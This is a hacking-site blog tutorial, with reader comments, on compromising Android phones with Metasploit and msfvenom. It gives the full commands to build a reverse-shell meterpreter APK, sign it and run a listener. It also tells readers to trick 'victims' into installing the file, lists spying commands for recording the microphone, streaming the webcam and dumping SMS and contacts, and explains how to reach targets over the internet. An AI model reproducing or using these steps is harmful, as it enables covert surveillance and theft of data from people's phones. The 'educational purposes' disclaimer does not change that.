• Write for Us
  • Courses
  • Blog
  • About Us
  • Contact
Hacker Academy
  • Write for Us
  • Courses
  • Blog
  • About Us
  • Contact

    Android

    • Home
    • Android
    • How to exploit android phones with Metasploit and msfvenom

    How to exploit android phones with Metasploit and msfvenom

    • Posted by shubham
    • Categories Android
    • Tags kali linux, Metasploit and msfvenom

    You have probably heard about the most famous hacking framework called Metasploit. This framework is one of the most used pentesting frameworks which by default is included in Kali Linux.

    All the professional hackers recommend Metasploit as their ideal tool for hacking and exploitation of android phones as well and windows devices.

    It also has plenty of modules for hacking IOS. The Metasploit and msfvenom are regarded as the best combination for hacking android devices

    Table of contents

    • What is msfvenom?
    • So why is Metasploit so great?
    • METASPLOIT AND MSFVENOM
      • Step 1: Creating a malicious apk file
      • Step 2: Delivering APK file to the victim
      • Step 3: Metasploit setup
      • Step 4: Exploit..!!!
    • So now for some advanced stuff: Hacking Over the internet with Metasploit and msfvenom
    • Commonly asked questions about hacking with Metasploit and msfvenom.

    What is msfvenom?

    Msfvenom is an android hacking framework used for making hacking apk files that have embedded reverse shells which can be used for hacking android devices.

    This tool was not present in backtrack but is now present in Kali Linux as a separate option to make android hacking as easy as possible. We will be using Metasploit and msfvenom together for this hack.

    So why is Metasploit so great?

    Metasploit built by rapid7 is a community-based project. It has numerous exploits and hacks made and optimized by the community. The best part is that it is free. To show how effective it is, so lets hack an android device with Metasploit and msfvenom

    METASPLOIT AND MSFVENOM

    When it comes to hacking Android phones, there are lots of ways for doing so. There are apps, web portals, scripts, and whatnot. We have already seen how to hack an android device with a spy note.

    So today we are going to guide you on how to hack android phone using Metasploit and MSFVenom.

    For performing this hack using Metasploit or msfvenom, you’ll need Kali Linux OS installed on your computer and Android Phone as a target. And obviously, an internet connection is a must.

    Below are the steps to perform this hack using Metasploit or msfvenom. So let’s start hacking.

    Step 1: Creating a malicious apk file

    Open your KALI LINUX. Open your Terminal and type in the following command

    Hack Android Phone using metasploit and msfvenom

    # msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=4444 R > hackingworld.apk

    Output:

    metasploit and msfvenom command prompt

    **LHOST= YOUR IP address

    **LPORT= 4444

    **Use ifconfig to find your IP address if you don`t know.

    # ifconfig

    metasploit and msfvenom using kali linux

    Step 2: Delivering APK file to the victim

    You have now created your malicious spyware .apk file using Metasploit and msfvenom. It will be saved to your /home/ folder by default. Find your newly created hackingworld.apk and send it to your target (hackingworld.apk). Use social engineering to do this so that the victim does install the apk.

    **If you get any signing errors or issues use the following:

    Keytool (Comes Pre-Installed in Kali Linux)

    keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

    Jarsigner (Comes Pre-Installed in Kali Linux)

    jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hackingworld.apk aliasname

    jarsigner -verify -verbose -certs hackingworld.apk

    Step 3: Metasploit setup

    Open up a new terminal and use the following command to start Metasploit framework.

    metasploit and msfvenom using console

    # msfconsole

    Now in the Metasploit framework console type the following

    msf  > use exploit/multi/handler
    msf exploit(handler) > set payload android/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.78.129
    msf exploit(handler) > set LPORT 4444
    msf exploit(handler) > exploit

    Here

    **LHOST= YOUR IP address

    **LPORT= 4444

    metasploit and msfvenom using TCP handler

    Now when the user opens up the app on his/her phone, you will get a session with that device. And whoa! The device is yours to operate. Metasploit and msfvenom are not that difficult to use but need very methodological steps that need to implement.

    Step 4: Exploit..!!!

    The moment the victim opens the application on their device, you will get a meterpreter shell on the Kali Linux terminal.

    You have now successfully hacked the android device using Metasploit and msfvenom

    Some commands you should try using Metasploit and msfvenom:

    – record_mic

    Records the audio from the android device and stores it on the local drive.

    – webcam_snap

    Lets you take the images by hacking the android camera of the device

    – webcam_stream

    Lets you stream live video from the hacked android camera

    – dump_contacts

    Lets you hack and copy all the contacts from the victim’s phone.

    – dump_sms

    Lets you hack the victim’s messages and stored it in a text file on your system.

    – geolocate

    Helps you track the hacked device by location

    So, this is how hackers hack using Metasploit and msfvenom on the local network. But what if we wanted to hack android devices with Metasploit over the internet.

    So now for some advanced stuff: Hacking Over the internet with Metasploit and msfvenom

    So what if we wanted to make the hack work anywhere in the world. What can we do to make the hack global so that we could hack anyone over the internet without buying any expensive server?

    Step 1: We need a router which can port forwarding feature. This is a must for hacking over the internet with Metasploit.

    Step 3: Next, we need dynamic IP for msfvenom and Metasploit to work over the internet, so go to noip.com and sign up. After signing up,

    Metasploit and msfvenom

    Click on Add Host and enter any name for the host. Click on save the host.

    Metasploit and msfvenom

    Step 4: Now Download DUC from the official website or click here. Install the DUC client and sign in to your account. Once you do the IP address for your system will automatically be updated in the DNS.  In case this doesn`t happen, you can manually configure the DNS.

    Metasploit and msfvenom

    Step 5: Click on add hosts on the DUC client as shown. If done properly, you will get all three green ticks.

    Set the correct host

    Metasploit and msfvenom

    All the settings are set

    Metasploit and msfvenom

    Step 6: Now, we need the gateway IP to port forward from our router settings. So type “ifconfig” in the command prompt, and you will get the gateway IP.

    Step 7: Now open any browser you have and paste the gateway IP there. It will prompt the login page. Enter the username and password of your router (by default both are admin for most routers).

    Step 8: Now navigate to the port forwarding option. Depending upon the router brand, the page might be at a different location, but the underlying principle is the same.

    Support required for Spynote

    Step 9: Click on Add Port and put value Add port 2222 again and keep it. You can put any port number you wish.

    Metasploit and msfvenom

    Step 10: Now, while setting up the two commands instead of my local IP use the ddns you just made on no IP.

    So in my case, it would be nightfury007.dns.net instead of 192.168.78.129

    Hack Android Phone using metasploit and msfvenom
    metasploit and msfvenom using TCP handler

    Step 15: Now, the rest of the method is the same. You have to use social engineering to make the victim install the APK on their device. This part is something you have to do on your own. It’s up to your creativity.

    Step 16: You have successfully hacked into the victim’s phone as soon as they install and open it.

    Step 17: You need not use NOIP you can instead of your public IP address while making the apk and setting up Metasploit. But the problem is the public Ip address keeps occasionally changing, so making use of public IP will be a temporary solution.

    Just google whats my IP to find your public IP address

    public ip

    Step 18: If you are having any issues with the no IP client. Do not use it instead, just directly use your public IP. Port forwarding is required by default on all hacking methods over the internet.

    Commonly asked questions about hacking with Metasploit and msfvenom.

    Q.1 Is this hacking tool Metasploit and msfvenom legal?

    No. It is not meant for hacking people. It is a tool meant for white hat pentesting only and should be used with the same intent. Hacking World is not responsible for any illegal use done by you.

    Q.2 It’s not working what do I do?

    Disable firewall and antivirus and then all the steps again. Make sure you do not make any typing mistakes while typing the commands.

    Q.3 My antivirus detects it as a virus is it safe?

    The apk file made by msfvenom is a virus made by you so obviously unless you use an application like veil framework it will get detected as a virus.

    Q.4 I want to hack my girlfriend’s phone how do I do it?

    We do not support black hat hacking, and we do not reply and respond to such requests. This article is meant only for educational purposes.

    Q.5 Can I use kali Linux with on my phone to use this hack?

    Yes, you can use the termux app, or you can use kali Linux nethunter to hack android devices with Metasploit and msfvenom.

    Q.6 I do not want to use NOIP?

    You can directly use your public IP address.

    Q.7 What is the difference between public and local IP address?

    Public Address is the address you have on the internet. You can just google whats my IP to find out your public IP.

    Your local IP is the IP address of your system on the local network. Use ifconfig for Linux and ipconfig for windows to find out your IP.

    Cocospy Phone Spy

    Tag:kali linux, Metasploit and msfvenom

    • Share:
    author avatar
    shubham

    Previous post

    How to hack android phones with Spynote (RAT Tool)
    April 15, 2021

    Next post

    How to hack windows 10 with FATRAT(Hack windows with a link)
    April 15, 2021

    You may also like

    top 10 skills every hackers must learn
    Top 10 Skills Every Hacker Must Learn
    8 August, 2021
    pexels-markus-spiske-1921326
    Top 10 Programming Languages for Hacking
    26 June, 2021
    pexels-sora-shimazaki-5926382
    Top 10 Hacking Movies of All Time
    26 June, 2021

      25 Comments

    1. Deepak
      June 16, 2021
      Reply

      If I have my own server how can i use msfvenom.

      • shubham
        June 16, 2021
        Reply

        Rather use noip. It works for dynamic ips. Using your own server is troublesome and you will probably need to install kali Linux on that’s server

      • Faisan
        January 15, 2022
        Reply

        Bro how can I send that apk to the Victim?

    2. Precious
      June 28, 2021
      Reply

      After setting all and Tcp is working, if i click on the app, no session is sent

    3. Jishu
      July 19, 2021
      Reply

      Sir, I was testing on my phone by using first method. After using exploit command (after procced by all commands) the framework dosen’t showing anything. It looks like it cannot got access to the phone. But, before using exploit command I installed the apk and run it just before the suing of exploit command. Still there is no output. and it looks like it got stuck. But, it didn’t and it looks like apk is not working.

      Can u help to to understand what is going wrong or may be it was my fault?

      • shubham
        July 19, 2021
        Reply

        Make sure the network setup is correct

      • Vamsi
        October 19, 2021
        Reply

        Yes, for me I am facing the same problem,bro if you get solution can you please help me

    4. NiceG13
      July 27, 2021
      Reply

      I have been doing some tests and came to the following conclusion.

      It doesn’t work at all well on devices running Android 10, 11 and 12.
      Another problem I found is that the webcam and microphone functions do not work either. It lacks persistence. Screenshots play audios when taking screenshots.

      Any advice or other tool?

      • shubham
        July 28, 2021
        Reply

        Spynote and paid tools work better. Obviously the good tools won’t be free

    5. anonymous
      July 30, 2021
      Reply

      android is very secure but despite of this fact , android has been hacked by pegasus , I am also an android developer but finding bugs is next to impossible for me in android

      Do you have any idea how to find vulnerable points in android? obviously just for educational purpose

    6. aslam
      July 31, 2021
      Reply

      sir i have done the first method and its take me to (meterpreter) so what commands should i use plz ?

      • shubham
        July 31, 2021
        Reply

        There is a post Metasploit Commands Cheatsheet

    7. Noob
      August 2, 2021
      Reply

      How to hack Android with link with phone

      • shubham
        August 2, 2021
        Reply

        There are many posts on that topic on the site for educational purposes. Check which ones work for you.

    8. ghost
      August 9, 2021
      Reply

      hey like i start streaming command now how to off it or exit from it and start another command?

    9. PRASANTH
      September 25, 2021
      Reply

      HOW CAN I EXPORT THE APP TO SAND MY VICTIME ANDROID PLZ EXPLAIN

      • shubham
        September 27, 2021
        Reply

        Social enginnering

    10. Roy
      October 10, 2021
      Reply

      I made the payload apk but when i am trying to run on my on the target phone it says “the app was build for an older version of android and may not work properly”
      Kindly help me regarding this matter.
      Thank You

      • shubham
        October 13, 2021
        Reply

        Msfvenom is an old tool maybe that’s why.

    11. Rogun
      December 6, 2021
      Reply

      When I finished, and tried to open the the apk in the phone. It opened zoom and did not work since later zoom wrote that it cant preview the app. How should I go about this

      • shubham
        December 7, 2021
        Reply

        There might be a version issue. This is an old method and may not work on the latest phones

    12. Vijyant Patel
      December 22, 2021
      Reply

      is it only works when victim and our device connect with same network?

    13. Faisan
      January 26, 2022
      Reply

      dude i got an erroe “unable to rebuild apk with apk tool” please help me

    14. Alex
      February 5, 2022
      Reply

      This a script kiddie one. I mean, you know android devices are not allowed to install external applications, unless the user has configured it for such. And if he did in some moment in time, it’s because probably he’s a developer, so he won’t open an apk that some ‘unknown’ sent to him.

      So sorry, find another way to do the hack.

    15. Avinash
      February 6, 2022
      Reply

      my msfvenom command not working

    Leave A Reply Cancel reply

    Your email address will not be published. Required fields are marked *

    Cocospy Phone Spy
    Cocospy Phone Spy

    Suggested Tools

    [email protected]
    Facebook Twitter Google-plus Pinterest

    Company

    • About Us
    • Contact
    • Write a Guest Post

    Links

    • Privacy
    • Terms

    Support

    • Disclaimer
    • Advertise With Us
    • FAQs

    All rights Reserved 2021 || For any issues contact: [email protected]

    • Privacy
    • Terms